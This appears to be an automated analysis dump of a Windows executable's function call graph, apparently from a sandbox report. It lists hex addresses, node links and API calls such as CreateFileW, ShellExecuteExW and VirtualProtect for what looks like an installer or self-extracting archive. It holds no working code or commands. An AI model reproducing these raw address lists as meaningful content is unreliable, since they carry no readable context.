7ff7bb249aad 26114->26109 26118 7ff7bb248e58 33 API calls 26114->26118 26117 7ff7bb262320 _handle_error 8 API calls 26115->26117 26116 7ff7bb26a450 31 API calls 26130 7ff7bb249b57 __vcrt_InitializeCriticalSectionEx 26116->26130 26119 7ff7bb24a40e 26117->26119 26118->26114 26119->25767 26120 7ff7bb249c89 26121 7ff7bb242aa0 101 API calls 26120->26121 26133 7ff7bb249d5c 26120->26133 26124 7ff7bb249ca1 26121->26124 26127 7ff7bb2428d0 104 API calls 26124->26127 26124->26133 26131 7ff7bb249cc9 26127->26131 26130->26120 26130->26133 26187 7ff7bb242bb0 26130->26187 26196 7ff7bb2428d0 26130->26196 26201 7ff7bb242aa0 26130->26201 26131->26133 26154 7ff7bb249cd7 __vcrt_InitializeCriticalSectionEx 26131->26154 26211 7ff7bb250bbc MultiByteToWideChar 26131->26211 26206 7ff7bb24204c 26133->26206 26134 7ff7bb24a1ec 26144 7ff7bb24a2c2 26134->26144 26217 7ff7bb26cf90 31 API calls 2 library calls 26134->26217 26136 7ff7bb24a157 26136->26134 26214 7ff7bb26cf90 31 API calls 2 library calls 26136->26214 26137 7ff7bb24a14b 26137->25767 26140 7ff7bb24a249 26218 7ff7bb26b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26140->26218 26141 7ff7bb24a3a2 26143 7ff7bb26a450 31 API calls 26141->26143 26142 7ff7bb24a2ae 26142->26144 26219 7ff7bb248cd0 33 API calls 2 library calls 26142->26219 26146 7ff7bb24a3cb 26143->26146 26144->26141 26147 7ff7bb248e58 33 API calls 26144->26147 26148 7ff7bb26a450 31 API calls 26146->26148 26147->26144 26148->26133 26150 7ff7bb24a16d 26215 7ff7bb26b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26150->26215 26151 7ff7bb24a1d8 26151->26134 26216 7ff7bb248cd0 33 API calls 2 library calls 26151->26216 26153 7ff7bb24a429 26220 7ff7bb262624 8 API calls 26153->26220 26154->26133 26154->26134 26154->26136 26154->26137 26154->26153 26155 7ff7bb250f68 WideCharToMultiByte 26154->26155 26212 7ff7bb24aa88 45 API calls 2 library calls 26154->26212 26213 7ff7bb26a270 31 API calls 2 library calls 26154->26213 26155->26154 26160 7ff7bb24a468 26159->26160 26160->25769 26162 7ff7bb2424fd CreateFileW 26161->26162 26164 7ff7bb2425ae GetLastError 26162->26164 26167 7ff7bb24266e 26162->26167 26165 7ff7bb246a0c 49 API calls 26164->26165 26166 7ff7bb2425dc 26165->26166 26168 7ff7bb2425e0 CreateFileW GetLastError 26166->26168 26173 7ff7bb24262c 26166->26173 26169 7ff7bb2426b1 SetFileTime 26167->26169 26172 7ff7bb2426cf 26167->26172 26168->26173 26169->26172 26170 7ff7bb262320 _handle_error 8 API calls 26174 7ff7bb24271b 26170->26174 26171 7ff7bb242708 26171->26170 26172->26171 26175 7ff7bb2320b0 33 API calls 26172->26175 26173->26167 26176 7ff7bb242736 26173->26176 26174->26107 26174->26114 26175->26171 26177 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26176->26177 26178 7ff7bb24273b 26177->26178 26180 7ff7bb26a47d 26179->26180 26186 7ff7bb26a492 26180->26186 26221 7ff7bb26d69c 15 API calls abort 26180->26221 26182 7ff7bb26a487 26222 7ff7bb2678e4 31 API calls _invalid_parameter_noinfo_noreturn 26182->26222 26183 7ff7bb262320 _handle_error 8 API calls 26185 7ff7bb249b37 26183->26185 26185->26116 26186->26183 26188 7ff7bb242bcd 26187->26188 26189 7ff7bb242be9 26187->26189 26190 7ff7bb242bfb 26188->26190 26223 7ff7bb23b9c4 99 API calls Concurrency::cancel_current_task 26188->26223 26189->26190 26192 7ff7bb242c01 SetFilePointer 26189->26192 26190->26130 26192->26190 26193 7ff7bb242c1e GetLastError 26192->26193 26193->26190 26194 7ff7bb242c28 26193->26194 26194->26190 26224 7ff7bb23b9c4 99 API calls Concurrency::cancel_current_task 26194->26224 26198 7ff7bb2428f6 26196->26198 26199 7ff7bb2428fd 26196->26199 26197 7ff7bb242320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26197->26199 26198->26130 26199->26197 26199->26198 26225 7ff7bb23b8a4 99 API calls Concurrency::cancel_current_task 26199->26225 26226 7ff7bb242778 26201->26226 26204 7ff7bb242ac7 26204->26130 26207 7ff7bb242066 26206->26207 26208 7ff7bb242072 26206->26208 26207->26208 26234 7ff7bb2420d0 26207->26234 26210->26098 26211->26154 26212->26154 26213->26154 26214->26150 26215->26151 26216->26134 26217->26140 26218->26142 26219->26144 26220->26100 26221->26182 26222->26186 26232 7ff7bb242789 _snwprintf 26226->26232 26227 7ff7bb262320 _handle_error 8 API calls 26230 7ff7bb24281d 26227->26230 26228 7ff7bb2427b5 26228->26227 26229 7ff7bb242890 SetFilePointer 26229->26228 26231 7ff7bb2428b8 GetLastError 26229->26231 26230->26204 26233 7ff7bb23b9c4 99 API calls Concurrency::cancel_current_task 26230->26233 26231->26228 26232->26228 26232->26229 26235 7ff7bb2420ea 26234->26235 26236 7ff7bb242102 26234->26236 26235->26236 26238 7ff7bb2420f6 FindCloseChangeNotification 26235->26238 26237 7ff7bb242126 26236->26237 26240 7ff7bb23b544 99 API calls 26236->26240 26237->26208 26238->26236 26240->26237 26241->25779 26243->25789 26245 7ff7bb26154b 26246 7ff7bb2614a2 26245->26246 26249 7ff7bb261900 26246->26249 26275 7ff7bb261558 26249->26275 26252 7ff7bb26198b 26253 7ff7bb261868 DloadReleaseSectionWriteAccess 6 API calls 26252->26253 26254 7ff7bb261998 RaiseException 26253->26254 26255 7ff7bb2614e1 26254->26255 26256 7ff7bb2619b4 26257 7ff7bb261a3d LoadLibraryExA 26256->26257 26258 7ff7bb261b85 26256->26258 26259 7ff7bb261aa9 26256->26259 26263 7ff7bb261abd 26256->26263 26257->26259 26260 7ff7bb261a54 GetLastError 26257->26260 26283 7ff7bb261868 26258->26283 26261 7ff7bb261ab4 FreeLibrary 26259->26261 26259->26263 26264 7ff7bb261a7e 26260->26264 26265 7ff7bb261a69 26260->26265 26261->26263 26262 7ff7bb261b1b GetProcAddress 26262->26258 26266 7ff7bb261b30 GetLastError 26262->26266 26263->26258 26263->26262 26268 7ff7bb261868 DloadReleaseSectionWriteAccess 6 API calls 26264->26268 26265->26259 26265->26264 26270 7ff7bb261b45 26266->26270 26269 7ff7bb261a8b RaiseException 26268->26269 26269->26255 26270->26258 26271 7ff7bb261868 DloadReleaseSectionWriteAccess 6 API calls 26270->26271 26272 7ff7bb261b67 RaiseException 26271->26272 26273 7ff7bb261558 _com_raise_error 6 API calls 26272->26273 26274 7ff7bb261b81 26273->26274 26274->26258 26276 7ff7bb2615d3 26275->26276 26277 7ff7bb26156e 26275->26277 26276->26252 26276->26256 26291 7ff7bb261604 26277->26291 26280 7ff7bb2615ce 26282 7ff7bb261604 DloadReleaseSectionWriteAccess 3 API calls 26280->26282 26282->26276 26284 7ff7bb261878 26283->26284 26290 7ff7bb2618d1 26283->26290 26285 7ff7bb261604 DloadReleaseSectionWriteAccess 3 API calls 26284->26285 26286 7ff7bb26187d 26285->26286 26287 7ff7bb2618cc 26286->26287 26288 7ff7bb2617d8 DloadProtectSection 3 API calls 26286->26288 26289 7ff7bb261604 DloadReleaseSectionWriteAccess 3 API calls 26287->26289 26288->26287 26289->26290 26290->26255 26292 7ff7bb26161f 26291->26292 26294 7ff7bb261573 26291->26294 26293 7ff7bb261624 GetModuleHandleW 26292->26293 26292->26294 26295 7ff7bb26163e GetProcAddress 26293->26295 26296 7ff7bb261639 26293->26296 26294->26280 26298 7ff7bb2617d8 26294->26298 26295->26296 26297 7ff7bb261653 GetProcAddress 26295->26297 26296->26294 26297->26296 26301 7ff7bb2617fa DloadProtectSection 26298->26301 26299 7ff7bb261802 26299->26280 26300 7ff7bb26183a VirtualProtect 26300->26299 26301->26299 26301->26300 26303 7ff7bb2616a4 VirtualQuery GetSystemInfo 26301->26303 26303->26300 26304 7ff7bb26d94c 26305 7ff7bb26d997 26304->26305 26309 7ff7bb26d95b abort 26304->26309 26311 7ff7bb26d69c 15 API calls abort 26305->26311 26307 7ff7bb26d97e RtlAllocateHeap 26308 7ff7bb26d995 26307->26308 26307->26309 26309->26305 26309->26307 26310 7ff7bb26bbc0 abort 2 API calls 26309->26310 26310->26309 26311->26308 26312 7ff7bb26bf2c 26319 7ff7bb26bc34 26312->26319 26324 7ff7bb26d440 35 API calls 2 library calls 26319->26324 26321 7ff7bb26bc3f 26325 7ff7bb26d068 35 API calls abort 26321->26325 26324->26321 26326 7ff7bb2620f0 26327 7ff7bb262106 _com_error::_com_error 26326->26327 26332 7ff7bb264078 26327->26332 26329 7ff7bb262117 26330 7ff7bb261900 _com_raise_error 14 API calls 26329->26330 26331 7ff7bb262163 26330->26331 26333 7ff7bb264097 26332->26333 26334 7ff7bb2640b4 RtlPcToFileHeader 26332->26334 26333->26334 26335 7ff7bb2640db RaiseException 26334->26335 26336 7ff7bb2640cc 26334->26336 26335->26329 26336->26335 26337 7ff7bb25b190 26680 7ff7bb23255c 26337->26680 26339 7ff7bb25b1db 26340 7ff7bb25be93 26339->26340 26341 7ff7bb25b1ef 26339->26341 26490 7ff7bb25b20c 26339->26490 26946 7ff7bb25f390 26340->26946 26345 7ff7bb25b2db 26341->26345 26346 7ff7bb25b1ff 26341->26346 26341->26490 26344 7ff7bb262320 _handle_error 8 API calls 26350 7ff7bb25c350 26344->26350 26347 7ff7bb25b391 26345->26347 26354 7ff7bb25b2f5 26345->26354 26351 7ff7bb25b207 26346->26351 26352 7ff7bb25b2a9 26346->26352 26688 7ff7bb2322bc GetDlgItem 26347->26688 26348 7ff7bb25beba IsDlgButtonChecked 26349 7ff7bb25bec9 26348->26349 26356 7ff7bb25bed5 SendDlgItemMessageW 26349->26356 26357 7ff7bb25bef0 GetDlgItem IsDlgButtonChecked 26349->26357 26359 7ff7bb24aae0 48 API calls 26351->26359 26351->26490 26353 7ff7bb25b2cb EndDialog 26352->26353 26352->26490 26353->26490 26360 7ff7bb24aae0 48 API calls 26354->26360 26356->26357 26358 7ff7bb2462dc 35 API calls 26357->26358 26362 7ff7bb25bf47 GetDlgItem 26358->26362 26363 7ff7bb25b236 26359->26363 26364 7ff7bb25b313 SetDlgItemTextW 26360->26364 26965 7ff7bb232520 26362->26965 26968 7ff7bb231ec4 34 API calls _handle_error 26363->26968 26369 7ff7bb25b326 26364->26369 26365 7ff7bb25b3b1 EndDialog 26544 7ff7bb25b3da 26365->26544 26368 7ff7bb25b408 GetDlgItem 26373 7ff7bb25b44f SetFocus 26368->26373 26374 7ff7bb25b422 IsDlgButtonChecked IsDlgButtonChecked 26368->26374 26377 7ff7bb25b340 GetMessageW 26369->26377 26369->26490 26372 7ff7bb25b246 26376 7ff7bb25b25c 26372->26376 26969 7ff7bb23250c 26372->26969 26378 7ff7bb25b465 26373->26378 26379 7ff7bb25b4f2 26373->26379 26374->26373 26394 7ff7bb25c363 26376->26394 26376->26490 26384 7ff7bb25b35e IsDialogMessageW 26377->26384 26377->26490 26385 7ff7bb24aae0 48 API calls 26378->26385 26702 7ff7bb238d04 26379->26702 26380 7ff7bb231fa0 31 API calls 26380->26490 26384->26369 26389 7ff7bb25b373 TranslateMessage DispatchMessageW 26384->26389 26390 7ff7bb25b46f 26385->26390 26386 7ff7bb25bcc5 26391 7ff7bb24aae0 48 API calls 26386->26391 26388 7ff7bb25b52c 26712 7ff7bb25ef80 26388->26712 26389->26369 26405 7ff7bb23129c 33 API calls 26390->26405 26395 7ff7bb25bcd6 SetDlgItemTextW 26391->26395 26397 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26394->26397 26396 7ff7bb24aae0 48 API calls 26395->26396 26400 7ff7bb25bd08 26396->26400 26401 7ff7bb25c368 26397->26401 26417 7ff7bb23129c 33 API calls 26400->26417 26411 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26401->26411 26404 7ff7bb24aae0 48 API calls 26408 7ff7bb25b555 26404->26408 26406 7ff7bb25b498 26405->26406 26409 7ff7bb25f0a4 24 API calls 26406->26409 26414 7ff7bb24da98 48 API calls 26408->26414 26416 7ff7bb25b4a5 26409->26416 26419 7ff7bb25c36e 26411->26419 26415 7ff7bb25b568 26414->26415 26726 7ff7bb25f0a4 26415->26726 26416->26401 26433 7ff7bb25b4e8 26416->26433 26449 7ff7bb25bd31 26417->26449 26429 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26419->26429 26427 7ff7bb25bdda 26434 7ff7bb24aae0 48 API calls 26427->26434 26435 7ff7bb25c374 26429->26435 26442 7ff7bb25b5ec 26433->26442 26972 7ff7bb25fa80 33 API calls 2 library calls 26433->26972 26444 7ff7bb25bde4 26434->26444 26455 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26435->26455 26439 7ff7bb231fa0 31 API calls 26447 7ff7bb25b586 26439->26447 26452 7ff7bb25b61a 26442->26452 26973 7ff7bb2432a8 26442->26973 26466 7ff7bb23129c 33 API calls 26444->26466 26447->26419 26447->26433 26449->26427 26460 7ff7bb23129c 33 API calls 26449->26460 26740 7ff7bb242f58 26452->26740 26459 7ff7bb25c37a 26455->26459 26471 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26459->26471 26467 7ff7bb25bd7f 26460->26467 26464 7ff7bb25b64c 26752 7ff7bb247fc4 26464->26752 26465 7ff7bb25b634 GetLastError 26465->26464 26470 7ff7bb25be0d 26466->26470 26473 7ff7bb24aae0 48 API calls 26467->26473 26469 7ff7bb25b60e 26976 7ff7bb259d90 12 API calls _handle_error 26469->26976 26487 7ff7bb23129c 33 API calls 26470->26487 26478 7ff7bb25c380 26471->26478 26479 7ff7bb25bd8a 26473->26479 26488 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26478->26488 26483 7ff7bb231150 33 API calls 26479->26483 26481 7ff7bb25b65e 26485 7ff7bb25b674 26481->26485 26486 7ff7bb25b665 GetLastError 26481->26486 26489 7ff7bb25bda2 26483->26489 26494 7ff7bb25b68b GetTickCount 26485->26494 26497 7ff7bb25b72b 26485->26497 26584 7ff7bb25b71c 26485->26584 26486->26485 26500 7ff7bb25be4e 26487->26500 26491 7ff7bb25c386 26488->26491 26493 7ff7bb232034 33 API calls 26489->26493 26490->26344 26495 7ff7bb23255c 61 API calls 26491->26495 26498 7ff7bb25bdbe 26493->26498 26755 7ff7bb234228 26494->26755 26501 7ff7bb25c3e4 26495->26501 26496 7ff7bb25ba50 26496->26365 26985 7ff7bb23bd0c 33 API calls 26496->26985 26497->26496 26502 7ff7bb246454 34 API calls 26497->26502 26503 7ff7bb231fa0 31 API calls 26498->26503 26506 7ff7bb231fa0 31 API calls 26500->26506 26507 7ff7bb25c3e8 26501->26507 26514 7ff7bb25c489 GetDlgItem SetFocus 26501->26514 26561 7ff7bb25c3fd 26501->26561 26509 7ff7bb25b74e 26502->26509 26510 7ff7bb25bdcc 26503->26510 26513 7ff7bb25be78 26506->26513 26523 7ff7bb262320 _handle_error 8 API calls 26507->26523 26977 7ff7bb24b914 102 API calls 26509->26977 26517 7ff7bb231fa0 31 API calls 26510->26517 26512 7ff7bb25ba75 26986 7ff7bb231150 26512->26986 26522 7ff7bb231fa0 31 API calls 26513->26522 26518 7ff7bb25c4ba 26514->26518 26517->26427 26532 7ff7bb23129c 33 API calls 26518->26532 26519 7ff7bb25b6ba 26525 7ff7bb231fa0 31 API calls 26519->26525 26520 7ff7bb25bb79 26526 7ff7bb24aae0 48 API calls 26520->26526 26528 7ff7bb25be83 26522->26528 26529 7ff7bb25ca97 26523->26529 26524 7ff7bb25b768 26531 7ff7bb24da98 48 API calls 26524->26531 26533 7ff7bb25b6c8 26525->26533 26534 7ff7bb25bba7 SetDlgItemTextW 26526->26534 26527 7ff7bb25ba8a 26535 7ff7bb24aae0 48 API calls 26527->26535 26536 7ff7bb231fa0 31 API calls 26528->26536 26540 7ff7bb25b7aa GetCommandLineW 26531->26540 26541 7ff7bb25c4cc 26532->26541 26765 7ff7bb242134 26533->26765 26542 7ff7bb232534 26534->26542 26543 7ff7bb25ba97 26535->26543 26536->26544 26537 7ff7bb25c434 SendDlgItemMessageW 26538 7ff7bb25c45d EndDialog 26537->26538 26539 7ff7bb25c454 26537->26539 26538->26507 26539->26538 26545 7ff7bb25b869 26540->26545 26546 7ff7bb25b84f 26540->26546 26990 7ff7bb2480d8 33 API calls 26541->26990 26548 7ff7bb25bbc5 SetDlgItemTextW GetDlgItem 26542->26548 26549 7ff7bb231150 33 API calls 26543->26549 26544->26380 26978 7ff7bb25ab54 33 API calls _handle_error 26545->26978 26562 7ff7bb2320b0 33 API calls 26546->26562 26553 7ff7bb25bc13 26548->26553 26554 7ff7bb25bbf0 GetWindowLongPtrW SetWindowLongPtrW 26548->26554 26555 7ff7bb25baaa 26549->26555 26550 7ff7bb25c4e0 26556 7ff7bb23250c SetDlgItemTextW 26550->26556 26781 7ff7bb25ce88 26553->26781 26554->26553 26560 7ff7bb231fa0 31 API calls 26555->26560 26563 7ff7bb25c4f4 26556->26563 26557 7ff7bb25b87a 26979 7ff7bb25ab54 33 API calls _handle_error 26557->26979 26568 7ff7bb25bab5 26560->26568 26561->26507 26561->26537 26562->26545 26573 7ff7bb25c526 SendDlgItemMessageW FindFirstFileW 26563->26573 26565 7ff7bb25b704 26570 7ff7bb24204c 100 API calls 26565->26570 26566 7ff7bb25b6f5 GetLastError 26566->26565 26572 7ff7bb231fa0 31 API calls 26568->26572 26569 7ff7bb25b88b 26980 7ff7bb25ab54 33 API calls _handle_error 26569->26980 26575 7ff7bb25b711 26570->26575 26571 7ff7bb25ce88 160 API calls 26576 7ff7bb25bc3c 26571->26576 26577 7ff7bb25bac3 26572->26577 26579 7ff7bb25c57b 26573->26579 26672 7ff7bb25ca04 26573->26672 26581 7ff7bb231fa0 31 API calls 26575->26581 26931 7ff7bb25f974 26576->26931 26586 7ff7bb24aae0 48 API calls 26577->26586 26590 7ff7bb24aae0 48 API calls 26579->26590 26580 7ff7bb25b89c 26981 7ff7bb24b9b4 102 API calls 26580->26981 26581->26584 26584->26497 26584->26520 26585 7ff7bb25ce88 160 API calls 26601 7ff7bb25bc6a 26585->26601 26589 7ff7bb25badb 26586->26589 26587 7ff7bb25b8b3 26982 7ff7bb25fbdc 33 API calls 26587->26982 26588 7ff7bb25ca81 26588->26507 26602 7ff7bb23129c 33 API calls 26589->26602 26595 7ff7bb25c59e 26590->26595 26592 7ff7bb25caa9 26593 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26592->26593 26597 7ff7bb25caae 26593->26597 26594 7ff7bb25bc96 26945 7ff7bb232298 GetDlgItem EnableWindow 26594->26945 26607 7ff7bb23129c 33 API calls 26595->26607 26596 7ff7bb25b8d2 CreateFileMappingW 26599 7ff7bb25b953 ShellExecuteExW 26596->26599 26600 7ff7bb25b911 MapViewOfFile 26596->26600 26605 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26597->26605 26619 7ff7bb25b974 26599->26619 26983 7ff7bb263640 26600->26983 26601->26594 26606 7ff7bb25ce88 160 API calls 26601->26606 26612 7ff7bb25bb04 26602->26612 26603 7ff7bb25b3f5 26603->26365 26603->26386 26608 7ff7bb25cab4 26605->26608 26606->26594 26609 7ff7bb25c5cd 26607->26609 26611 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26608->26611 26610 7ff7bb231150 33 API calls 26609->26610 26614 7ff7bb25c5e8 26610->26614 26616 7ff7bb25caba 26611->26616 26612->26459 26613 7ff7bb25bb5a 26612->26613 26617 7ff7bb231fa0 31 API calls 26613->26617 26991 7ff7bb23e164 33 API calls 2 library calls 26614->26991 26615 7ff7bb25b9c3 26620 7ff7bb25b9dc UnmapViewOfFile CloseHandle 26615->26620 26621 7ff7bb25b9ef 26615->26621 26624 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26616->26624 26617->26365 26619->26615 26627 7ff7bb25b9b1 Sleep 26619->26627 26620->26621 26621->26435 26623 7ff7bb25ba25 26621->26623 26622 7ff7bb25c5ff 26625 7ff7bb231fa0 31 API calls 26622->26625 26629 7ff7bb231fa0 31 API calls 26623->26629 26628 7ff7bb25cac0 26624->26628 26626 7ff7bb25c60c 26625->26626 26626->26597 26631 7ff7bb231fa0 31 API calls 26626->26631 26627->26615 26627->26619 26632 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26628->26632 26630 7ff7bb25ba42 26629->26630 26633 7ff7bb231fa0 31 API calls 26630->26633 26634 7ff7bb25c673 26631->26634 26635 7ff7bb25cac6 26632->26635 26633->26496 26636 7ff7bb23250c SetDlgItemTextW 26634->26636 26638 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26635->26638 26637 7ff7bb25c687 FindClose 26636->26637 26639 7ff7bb25c797 SendDlgItemMessageW 26637->26639 26640 7ff7bb25c6a3 26637->26640 26641 7ff7bb25cacc 26638->26641 26643 7ff7bb25c7cb 26639->26643 26992 7ff7bb25a2cc 10 API calls _handle_error 26640->26992 26645 7ff7bb24aae0 48 API calls 26643->26645 26644 7ff7bb25c6c6 26646 7ff7bb24aae0 48 API calls 26644->26646 26647 7ff7bb25c7d8 26645->26647 26648 7ff7bb25c6cf 26646->26648 26650 7ff7bb23129c 33 API calls 26647->26650 26649 7ff7bb24da98 48 API calls 26648->26649 26654 7ff7bb25c6ec BuildCatchObjectHelperInternal 26649->26654 26651 7ff7bb25c807 26650->26651 26653 7ff7bb231150 33 API calls 26651->26653 26652 7ff7bb231fa0 31 API calls 26655 7ff7bb25c783 26652->26655 26656 7ff7bb25c822 26653->26656 26654->26608 26654->26652 26657 7ff7bb23250c SetDlgItemTextW 26655->26657 26993 7ff7bb23e164 33 API calls 2 library calls 26656->26993 26657->26639 26659 7ff7bb25c839 26660 7ff7bb231fa0 31 API calls 26659->26660 26661 7ff7bb25c845 BuildCatchObjectHelperInternal 26660->26661 26662 7ff7bb231fa0 31 API calls 26661->26662 26663 7ff7bb25c87f 26662->26663 26664 7ff7bb231fa0 31 API calls 26663->26664 26665 7ff7bb25c88c 26664->26665 26665->26616 26666 7ff7bb231fa0 31 API calls 26665->26666 26667 7ff7bb25c8f3 26666->26667 26668 7ff7bb23250c SetDlgItemTextW 26667->26668 26669 7ff7bb25c907 26668->26669 26669->26672 26994 7ff7bb25a2cc 10 API calls _handle_error 26669->26994 26671 7ff7bb25c932 26673 7ff7bb24aae0 48 API calls 26671->26673 26672->26507 26672->26588 26672->26592 26672->26635 26674 7ff7bb25c93c 26673->26674 26675 7ff7bb24da98 48 API calls 26674->26675 26677 7ff7bb25c959 BuildCatchObjectHelperInternal 26675->26677 26676 7ff7bb231fa0 31 API calls 26678 7ff7bb25c9f0 26676->26678 26677->26628 26677->26676 26679 7ff7bb23250c SetDlgItemTextW 26678->26679 26679->26672 26681 7ff7bb23256a 26680->26681 26682 7ff7bb2325d0 26680->26682 26681->26682 26995 7ff7bb24a4ac 26681->26995 26682->26339 26684 7ff7bb23258f 26684->26682 26685 7ff7bb2325a4 GetDlgItem 26684->26685 26685->26682 26686 7ff7bb2325b7 26685->26686 26686->26682 26687 7ff7bb2325be SetDlgItemTextW 26686->26687 26687->26682 26689 7ff7bb2322fc 26688->26689 26690 7ff7bb232334 26688->26690 26692 7ff7bb23129c 33 API calls 26689->26692 27044 7ff7bb2323f8 GetWindowTextLengthW 26690->27044 26693 7ff7bb23232a BuildCatchObjectHelperInternal 26692->26693 26694 7ff7bb231fa0 31 API calls 26693->26694 26697 7ff7bb232389 26693->26697 26694->26697 26695 7ff7bb2323c8 26696 7ff7bb262320 _handle_error 8 API calls 26695->26696 26698 7ff7bb2323dd 26696->26698 26697->26695 26699 7ff7bb2323f0 26697->26699 26698->26365 26698->26368 26698->26603 26700 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26699->26700 26701 7ff7bb2323f5 26700->26701 26703 7ff7bb238d34 26702->26703 26710 7ff7bb238de8 26702->26710 26706 7ff7bb238de3 26703->26706 26708 7ff7bb238d91 26703->26708 26709 7ff7bb238d42 BuildCatchObjectHelperInternal 26703->26709 27056 7ff7bb231f80 33 API calls 3 library calls 26706->27056 26708->26709 26711 7ff7bb2621d0 33 API calls 26708->26711 26709->26388 27057 7ff7bb232004 33 API calls std::_Xinvalid_argument 26710->27057 26711->26709 26716 7ff7bb25efb0 26712->26716 26713 7ff7bb25efd7 26714 7ff7bb262320 _handle_error 8 API calls 26713->26714 26715 7ff7bb25b537 26714->26715 26715->26404 26716->26713 27058 7ff7bb23bd0c 33 API calls 26716->27058 26718 7ff7bb25f02a 26719 7ff7bb231150 33 API calls 26718->26719 26720 7ff7bb25f03f 26719->26720 26722 7ff7bb231fa0 31 API calls 26720->26722 26724 7ff7bb25f04f BuildCatchObjectHelperInternal 26720->26724 26721 7ff7bb231fa0 31 API calls 26723 7ff7bb25f076 26721->26723 26722->26724 26725 7ff7bb231fa0 31 API calls 26723->26725 26724->26721 26725->26713 27059 7ff7bb25ae1c PeekMessageW 26726->27059 26729 7ff7bb25f143 IsDlgButtonChecked IsDlgButtonChecked 26731 7ff7bb25f189 26729->26731 26732 7ff7bb25f1a4 IsDlgButtonChecked 26729->26732 26730 7ff7bb25f0f5 26735 7ff7bb25f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26730->26735 26731->26732 26733 7ff7bb25f1c3 26732->26733 26734 7ff7bb25f1c6 IsDlgButtonChecked IsDlgButtonChecked 26732->26734 26733->26734 26736 7ff7bb25f218 IsDlgButtonChecked 26734->26736 26737 7ff7bb25f1f3 IsDlgButtonChecked 26734->26737 26735->26729 26738 7ff7bb262320 _handle_error 8 API calls 26736->26738 26737->26736 26739 7ff7bb25b578 26738->26739 26739->26439 26741 7ff7bb24309d 26740->26741 26748 7ff7bb242f8e 26740->26748 26742 7ff7bb262320 _handle_error 8 API calls 26741->26742 26743 7ff7bb2430b3 26742->26743 26743->26464 26743->26465 26744 7ff7bb243077 26744->26741 26745 7ff7bb243684 56 API calls 26744->26745 26745->26741 26746 7ff7bb23129c 33 API calls 26746->26748 26748->26744 26748->26746 26749 7ff7bb2430c8 26748->26749 27064 7ff7bb243684 26748->27064 26750 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26749->26750 26751 7ff7bb2430cd 26750->26751 26753 7ff7bb247fd2 SetCurrentDirectoryW 26752->26753 26754 7ff7bb247fcf 26752->26754 26753->26481 26754->26753 26756 7ff7bb234255 26755->26756 26757 7ff7bb23426a 26756->26757 26758 7ff7bb23129c 33 API calls 26756->26758 26759 7ff7bb262320 _handle_error 8 API calls 26757->26759 26758->26757 26760 7ff7bb2342a1 26759->26760 26761 7ff7bb233c84 26760->26761 26762 7ff7bb233cab 26761->26762 27098 7ff7bb23710c 26762->27098 26764 7ff7bb233cbb BuildCatchObjectHelperInternal 26764->26519 26767 7ff7bb24216a 26765->26767 26766 7ff7bb24219e 26769 7ff7bb24227f 26766->26769 26771 7ff7bb246a0c 49 API calls 26766->26771 26767->26766 26768 7ff7bb2421b1 CreateFileW 26767->26768 26768->26766 26770 7ff7bb2422af 26769->26770 26774 7ff7bb2320b0 33 API calls 26769->26774 26772 7ff7bb262320 _handle_error 8 API calls 26770->26772 26773 7ff7bb242209 26771->26773 26775 7ff7bb2422c4 26772->26775 26776 7ff7bb24220d CreateFileW 26773->26776 26777 7ff7bb242246 26773->26777 26774->26770 26775->26565 26775->26566 26776->26777 26777->26769 26778 7ff7bb2422d8 26777->26778 26779 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26778->26779 26780 7ff7bb2422dd 26779->26780 27110 7ff7bb25aa08 26781->27110 26783 7ff7bb25d1ee 26784 7ff7bb231fa0 31 API calls 26783->26784 26785 7ff7bb25d1f7 26784->26785 26787 7ff7bb262320 _handle_error 8 API calls 26785->26787 26786 7ff7bb24d22c 33 API calls 26904 7ff7bb25cf03 BuildCatchObjectHelperInternal 26786->26904 26788 7ff7bb25bc2b 26787->26788 26788->26571 26789 7ff7bb25eefa 27235 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 26789->27235 26792 7ff7bb25ef00 27236 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 26792->27236 26794 7ff7bb25ef06 26798 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26794->26798 26796 7ff7bb25eeee 26797 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26796->26797 26799 7ff7bb25eef4 26797->26799 26800 7ff7bb25ef0c 26798->26800 27234 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 26799->27234 26803 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26800->26803 26805 7ff7bb25ef12 26803->26805 26804 7ff7bb25ee4a 26806 7ff7bb25eed2 26804->26806 26807 7ff7bb2320b0 33 API calls 26804->26807 26810 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26805->26810 27232 7ff7bb231f80 33 API calls 3 library calls 26806->27232 26811 7ff7bb25ee77 26807->26811 26808 7ff7bb25eee8 27233 7ff7bb232004 33 API calls std::_Xinvalid_argument 26808->27233 26809 7ff7bb2313a4 33 API calls 26812 7ff7bb25dc3a GetTempPathW 26809->26812 26813 7ff7bb25ef18 26810->26813 27231 7ff7bb25abe8 33 API calls 3 library calls 26811->27231 26812->26904 26820 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26813->26820 26814 7ff7bb2462dc 35 API calls 26814->26904 26818 7ff7bb25ee8d 26827 7ff7bb231fa0 31 API calls 26818->26827 26830 7ff7bb25eea4 BuildCatchObjectHelperInternal 26818->26830 26819 7ff7bb232520 